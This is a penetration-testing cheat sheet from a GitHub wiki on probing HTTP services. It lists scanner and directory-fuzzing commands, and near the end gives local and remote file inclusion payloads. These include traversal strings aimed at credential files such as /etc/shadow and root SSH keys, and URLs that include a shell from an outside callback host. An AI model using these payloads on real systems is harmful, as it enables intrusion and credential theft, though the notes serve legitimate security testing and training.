HTTP General Notes - TheGetch/Penetration-Testing-Methodology GitHub Wiki

HTTP General Notes

Step 1: ALWAYS LOOK AT THE SOURCE CODE OF THE WEBPAGE!

Manual Connect

Using openssl to connect to a webserver (HTTPS):

openssl s_client -connect hack.me:443 [-debug] [-state] [-quiet]
  • Debug flag optional.
  • State is optional - prints the state of the handshake.
  • Quiet is optional.

Using Httprint to identify web servers: httprint -P0 -h <target hosts> -s <signature file>

  • -P0 to avoid pinging the host first
  • -h the list of hosts (IP addresses/IP range)
  • -s signature file to use

Web App Scanners

Nikto:

  • nikto --url <domain>

Wpscan:

  • wpscan --url <domain>
  • wpscan --url <domain> --enumerate ap at (All Plugins, All Themes)
  • wpscan --url <domain> --enumerate u (Usernames)
  • wpscan --url <domain> --enumerate v

Web Tools for Directory Scanning:

Dirb:

  • dirb <domain>
  • dirb <domain> <wordlist>

Gobuster:

  • gobuster -u <url> -w /usr/share/wordlists/<Wordlist file>
  • gobuster -u <url> -w /usr/share/wordlists/<Wordlist file> -a Firefox (Custom Agent)
  • gobuster -u <url> -w /usr/share/wordlists/<Wordlist file> -x .php,.txt,.html
  • gobuster -u <url> -w /usr/share/wordlists/<Wordlist file> -x .php,.txt,.html -s "200"
  • gobuster -e -u <url> -w /usr/share/wordlists/<Wordlist file> -x .php,.txt,.html -s "200"
  • gobuster -v -e -u <url> -w /usr/share/wordlists/<Wordlist file> -x .php,.txt,.html -s "200"
  • gobuster -v -e -u <url> -w /usr/share/wordlists/<Wordlist file> -x .php,.txt,.html -s "200" -o output.txt
  • gobuster -s 200,204,301,302,307,403 -u 172.21.0.0 -w /usr/share/seclists/Discovery/Web_Content/big.txt -t 80 -a 'Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0'

Wfuzz:

  • wfuzz -w wordlist/general/common.txt http://testphp.vulnweb.com/FUZZ
  • wfuzz -z range,0-10 --hl 97 http://testphp.vulnweb.com/listproducts.php?cat=FUZZ
  • wfuzz -z file,wordlist/others/common_pass.txt -d "uname=FUZZ&pass=FUZZ" --hc 302 http://testphp.vulnweb.com/userinfo.php (Post Requests)
  • wfuzz -z file,wordlist/general/common.txt -b cookie=value1 -b cookie2=value2 http://testphp.vulnweb.com/FUZZ (Fuzzing Cookies)

Dirsearch:

  • dirsearch /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 172.21.0.0 -e php

Other Tools:

  • Burp Suite
  • OWASP Zap
  • Cadaver
  • SQLMap
  • Joomscan

Testing for LFI:

https://www.exploit-db.com/docs/english/40992-web-app-penetration-testing---local-file-inclusion-(lfi).pdf

Examples:

http://example.com/index.php?page=etc/passwd http://example.com/index.php?page=etc/passwd%00 http://example.com/index.php?page=../../etc/passwd http://example.com/index.php?page=%252e%252e%252f http://example.com/index.php?page=....//....//etc/passwd

Interesting Files:

Linux:

/etc/passwd
/etc/shadow
/etc/issue
/etc/group
/etc/hostname
/etc/ssh/ssh_config
/etc/ssh/sshd_config
/root/.ssh/id_rsa
/root/.ssh/authorized_keys
/home/user/.ssh/authorized_keys
/home/user/.ssh/id_rsa

Windows:

/boot.ini
/autoexec.bat
/windows/system32/drivers/etc/hosts
/windows/repair/SAM

Testing for RFI:

http://example.com/index.php?page=http://callback.com/shell.txt http://example.com/index.php?page=http://callback.com/shell.txt%00 http://example.com/index.php?page=http:%252f%252fcallback.com%252fshell.txt

Resources

⚠️ **GitHub.com Fallback** ⚠️